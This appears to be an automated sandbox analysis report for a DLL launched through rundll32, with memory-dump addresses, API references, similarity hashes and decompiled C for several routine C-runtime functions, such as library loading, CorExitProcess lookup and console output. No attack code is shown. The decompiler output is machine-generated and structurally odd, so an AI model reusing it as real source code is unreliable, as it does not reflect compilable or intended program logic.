0x6ed3362e
0x6ed3362f
0x00000000
0x6ed3362f
0x6ed335f3
0x6ed335fa
0x00000000
0x00000000
0x00000000
0x6ed335fa
0x6ed335d8
0x6ed335e3
0x00000000
0x6ed335e3
0x6ed33595
0x6ed3359b
0x6ed335ae
0x6ed335b1
0x6ed335b3
0x6ed335b5
0x00000000
0x6ed335b5
0x6ed335a1
0x6ed335a8
0x00000000
0x00000000
0x00000000
0x6ed335a8
0x6ed33581
0x00000000

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6ED3358D

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 33257a865b8728fa2835402256bfd533cfdef5d95dc22fe03e6f75f52d140589
Instruction ID: 58bf332fa4ec37d5dd69f86f79d764d4dcde0dbd720dc8df3e4a722e93e31eb8
Opcode Fuzzy Hash: 33257a865b8728fa2835402256bfd533cfdef5d95dc22fe03e6f75f52d140589
Instruction Fuzzy Hash: C1219372604225BFDB109FE6CE4899A77BDEF473A87314A29F824D7254DB30EC4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED30422, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED30422(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6ed6e568 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6ed660c8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6ED31EF8(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6ed30429
0x6ed3049d
0x6ed3042e
0x6ed30430
0x6ed30437
0x6ed3043b
0x6ed30444
0x6ed30453
0x6ed3045c
0x6ed30460
0x6ed304a9
0x6ed304ab
0x6ed304af
0x6ed304b2
0x6ed304b2
0x6ed304b8
0x6ed304b8
0x6ed304a4
0x6ed304a8
0x6ed304a8
0x6ed30462
0x6ed3046b
0x6ed30495
0x6ed30498
0x6ed3049a
0x6ed3049a
0x00000000
0x6ed3049a
0x6ed3046d
0x6ed30478
0x6ed3047d
0x6ed30482
0x00000000
0x00000000
0x6ed30489
0x6ed3048f
0x6ed30493
0x00000000
0x00000000
0x00000000
0x6ed30493
0x6ed30440
0x00000000
0x00000000
0x00000000
0x6ed30442
0x6ed304a2
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6ED304E3,00000000,?,00000001,00000000,?,6ED3055A,00000001,FlsFree,6ED66184,FlsFree,00000000), ref: 6ED304B2

Strings

api-ms-, xrefs: 6ED30472

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: cda53a47124baae821dfbec2950843331fa5f8ec238700acfb5f80a9719f4234
Instruction ID: d1b22996c73363a20d09fda176096e36816ac38f15c16eaa4f6c067f203c49b7
Opcode Fuzzy Hash: cda53a47124baae821dfbec2950843331fa5f8ec238700acfb5f80a9719f4234
Instruction Fuzzy Hash: 0611A732A41A31EFEF618BA88C44B4D33A49F037F0F350121E954EB284E770EE0186E5

Uniqueness

Uniqueness Score: -1.00%

Function 6ED312ED, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6ED312ED(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x6ed6d804; // 0x921d3f26
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], E6ED39B33, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x6ed3a154(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x6ed31302
0x6ed3130d
0x6ed31313
0x6ed31317
0x6ed31322
0x6ed3132a
0x6ed31334
0x6ed3133a
0x6ed3133e
0x6ed31345
0x6ed3134b
0x6ed3134b
0x6ed3133e
0x6ed31351
0x6ed31356
0x6ed31356
0x6ed3135f
0x6ed31369

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,921D3F26,00000000,?,00000000,6ED39B33,000000FF,?,6ED3127D,?,?,6ED31251,?), ref: 6ED31322
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ED31334
FreeLibrary.KERNEL32(00000000,?,00000000,6ED39B33,000000FF,?,6ED3127D,?,?,6ED31251,?), ref: 6ED31356

Strings

mscoree.dll, xrefs: 6ED3131B
CorExitProcess, xrefs: 6ED3132C

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 04bc10bd2f6e60563fa09e7583ddd58884c4610589e650e40305727f6a0309b5
Instruction ID: bb2eca01639178d5f7a7eedc013c7417d8531a892f5645535c97ca66fbe35e97
Opcode Fuzzy Hash: 04bc10bd2f6e60563fa09e7583ddd58884c4610589e650e40305727f6a0309b5
Instruction Fuzzy Hash: 3C01D63290496AEFEF119F90CC08FBEBBB8FB06710F104525F821A2680DB74D908CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C2C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED1C2C0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtWaitForKeyedEvent");
				}
			}

0x6ed1c2c5
0x6ed1c2cd
0x6ed1c2dc
0x6ed1c2cf
0x6ed1c2db
0x6ed1c2db

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ED1C2C5
GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6ED1C2D5

Strings

ntdll, xrefs: 6ED1C2C0
NtWaitForKeyedEvent, xrefs: 6ED1C2CF

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtWaitForKeyedEvent$ntdll
API String ID: 1646373207-2815205136
Opcode ID: c891e23b629b34ecee055b2ac9786d48fc3b9a1584d4d2c7b2516a7ad6a6dd2b
Instruction ID: 5542b670307cd9e3b12c7a7c134d84ee00bbf4a56a492e242b1e10fac127ffae
Opcode Fuzzy Hash: c891e23b629b34ecee055b2ac9786d48fc3b9a1584d4d2c7b2516a7ad6a6dd2b
Instruction Fuzzy Hash: 80B012F8F44601AFBEB06FF24F0CAA63B28EAB32827400850B016DE10CFA24C005DD72

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C2E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED1C2E0() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtReleaseKeyedEvent");
				}
			}

0x6ed1c2e5
0x6ed1c2ed
0x6ed1c2fc
0x6ed1c2ef
0x6ed1c2fb
0x6ed1c2fb

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ED1C2E5
GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6ED1C2F5

Strings

ntdll, xrefs: 6ED1C2E0
NtReleaseKeyedEvent, xrefs: 6ED1C2EF

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtReleaseKeyedEvent$ntdll
API String ID: 1646373207-31681898
Opcode ID: c107aee2e01de1e7cf5cc79d9cffeb7c215cc3778ffb8ef516c8d09754f2bc27
Instruction ID: b0606e09b0d30909fcb7cbb6036113cc089662748da6d48d8a1a11d1e345fee9
Opcode Fuzzy Hash: c107aee2e01de1e7cf5cc79d9cffeb7c215cc3778ffb8ef516c8d09754f2bc27
Instruction Fuzzy Hash: 6EB092B4F04502A7AE706BF25B0CA963A18A9822827000860A022EE108FA24C005D922

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C280, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED1C280() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "SetThreadDescription");
				}
			}

0x6ed1c285
0x6ed1c28d
0x6ed1c29c
0x6ed1c28f
0x6ed1c29b
0x6ed1c29b

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ED1C285
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6ED1C295

Strings

SetThreadDescription, xrefs: 6ED1C28F
kernel32, xrefs: 6ED1C280

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: 36c44d9778372f6c588558106251499e00176bab2773815452139eb152d1d6bf
Instruction ID: f96264de3e73003569960efcc509b609f8e27f20173ed74db2a1a92b53cae314
Opcode Fuzzy Hash: 36c44d9778372f6c588558106251499e00176bab2773815452139eb152d1d6bf
Instruction Fuzzy Hash: 5AB012B8F44602ABBE706FF24F0CA963B29E9C7281B000450B015DA10DEE24C005F972

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C260, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED1C260() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("kernel32");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "GetSystemTimePreciseAsFileTime");
				}
			}

0x6ed1c265
0x6ed1c26d
0x6ed1c27c
0x6ed1c26f
0x6ed1c27b
0x6ed1c27b

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6ED1C265
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6ED1C275

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6ED1C26F
kernel32, xrefs: 6ED1C260

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32
API String ID: 1646373207-392834919
Opcode ID: 471260a2acdbe4c06112da46e3e432497839195bcc8669fdb8bd2be25042404c
Instruction ID: 9f83c132a4e718b0f903a0d9fe18b4b4362e50e9bdfa34c0ba2f19016f5317dd
Opcode Fuzzy Hash: 471260a2acdbe4c06112da46e3e432497839195bcc8669fdb8bd2be25042404c
Instruction Fuzzy Hash: 2AB012F4F04605A7BE706FF24F4CA963B19B9D7281B004450F112DE10CFA24C045ED32

Uniqueness

Uniqueness Score: -1.00%

Function 6ED1C300, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED1C300() {
				struct HINSTANCE__* _t1;

				_t1 = GetModuleHandleA("ntdll");
				if(_t1 == 0) {
					return _t1;
				} else {
					return GetProcAddress(_t1, "NtCreateKeyedEvent");
				}
			}

0x6ed1c305
0x6ed1c30d
0x6ed1c31c
0x6ed1c30f
0x6ed1c31b
0x6ed1c31b

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6ED1C305
GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6ED1C315

Strings

ntdll, xrefs: 6ED1C300
NtCreateKeyedEvent, xrefs: 6ED1C30F

Memory Dump Source

Source File: 00000003.00000002.642548068.000000006ED11000.00000020.00020000.sdmp, Offset: 6ED10000, based on PE: true

Associated: 00000003.00000002.642533398.000000006ED10000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642617532.000000006ED3A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.642681588.000000006ED6D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.642689132.000000006ED6F000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.642695305.000000006ED70000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtCreateKeyedEvent$ntdll
API String ID: 1646373207-1373576770
Opcode ID: 2aad448632e9baa6e706620b757eb4003c8a55cc41cff11e14fff40b821f6ad1
Instruction ID: a7e1722cf8e09c38785b7594d0f4c6adfa788d45b321218d40ab5ef9d53a79c9
Opcode Fuzzy Hash: 2aad448632e9baa6e706620b757eb4003c8a55cc41cff11e14fff40b821f6ad1
Instruction Fuzzy Hash: D8B092B4F04501ABAE70ABF25A0CA963A18A9532C27404850A022DD10EEA24C406D921

Uniqueness

Uniqueness Score: -1.00%

Function 6ED36749, Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6ED36749(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(E6ED39B8A);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0x6ed6d804; // 0x921d3f26
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x6ed6e940 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E6ED31E20(_t265, _t291, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0x6ed6e940 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0x6ed6e940 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x6ed6e940 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = E6ED350E3(_t273, _t292,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = E6ED350E3(_t273, _t292);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0x6ed6df50; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0x6ed6e940 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E6ED373AF( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x6ed6df50)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0x6ed6e940 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										E6ED2D4D0( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0x6ed6e940 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E6ED373AF( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = E6ED34073(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E6ED2C717(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

0x6ed3674e
0x6ed36750
0x6ed3675b
0x6ed3675c
0x6ed3675f
0x6ed36764
0x6ed36766
0x6ed3676c
0x6ed36770
0x6ed36776
0x6ed3677b
0x6ed36781
0x6ed36784
0x6ed36787
0x6ed3678a
0x6ed3678d
0x6ed36790
0x6ed3679a
0x6ed367a1
0x6ed367a9
0x6ed367ac
0x6ed367b2
0x6ed367b6
0x6ed367b9
0x6ed367bd
0x6ed367bd
0x6ed367c5
0x6ed367cd
0x6ed367d2
0x6ed367d3
0x6ed367d4
0x6ed367d5
0x6ed367d8
0x6ed367da
0x6ed367e0
0x6ed367e6
0x6ed367e9
0x6ed367eb
0x6ed367ee
0x6ed367f7
0x6ed367fd
0x6ed36800
0x6ed36807
0x6ed3680e
0x6ed36811
0x6ed3694b
0x6ed3694f
0x6ed36952
0x6ed36975
0x6ed3697b
0x6ed3697d
0x6ed36981
0x6ed369b2
0x6ed369b5
0x6ed369b7
0x00000000
0x6ed36983
0x6ed36983
0x6ed36986
0x6ed36989
0x6ed3698c
0x6ed36ad6
0x6ed36ae4
0x6ed36aed
0x6ed36992
0x6ed3699c
0x6ed369a1
0x6ed369a4
0x6ed369a7
0x6ed369ad
0x00000000
0x6ed369ad
0x6ed369a7
0x6ed3698c
0x6ed36954
0x6ed3695b
0x6ed3695e
0x6ed36961
0x6ed36963
0x6ed36966
0x6ed3696d
0x6ed3696f
0x6ed369b8
0x6ed369bb
0x6ed369bc
0x6ed369c1
0x6ed369c4
0x6ed369c7
0x6ed369cd
0x00000000
0x6ed369cd
0x6ed369c7
0x6ed36817
0x6ed3681a
0x6ed3681c
0x6ed3681e
0x6ed36822
0x6ed36823
0x6ed36827
0x00000000
0x00000000
0x00000000
0x6ed36827
0x6ed3682c
0x6ed3682e
0x6ed36833
0x6ed368f3
0x6ed368fa
0x6ed368fb
0x6ed368fe
0x6ed36900
0x6ed36ab0
0x6ed36ab2
0x00000000
0x6ed36ab4
0x6ed36ab4
0x6ed36ab7
0x6ed36ac6
0x6ed36aca
0x6ed36acb
0x6ed36acb
0x00000000
0x6ed36acf
0x00000000
0x6ed36906
0x6ed3690b
0x6ed3690e
0x6ed36911
0x6ed36917
0x6ed36920
0x6ed3692b
0x6ed36930
0x6ed36933
0x6ed36936
0x6ed3693f
0x6ed3693f
0x6ed36942
0x00000000
0x6ed36942
0x6ed36936
0x6ed36839
0x6ed3683c
0x6ed36842
0x6ed36844
0x6ed36851
0x6ed36852
0x6ed36855
0x6ed36858
0x6ed3685d
0x6ed36a81
0x6ed36a83
0x6ed36a85
0x6ed36a88
0x6ed36a8b
0x6ed36a97
0x6ed36a9a
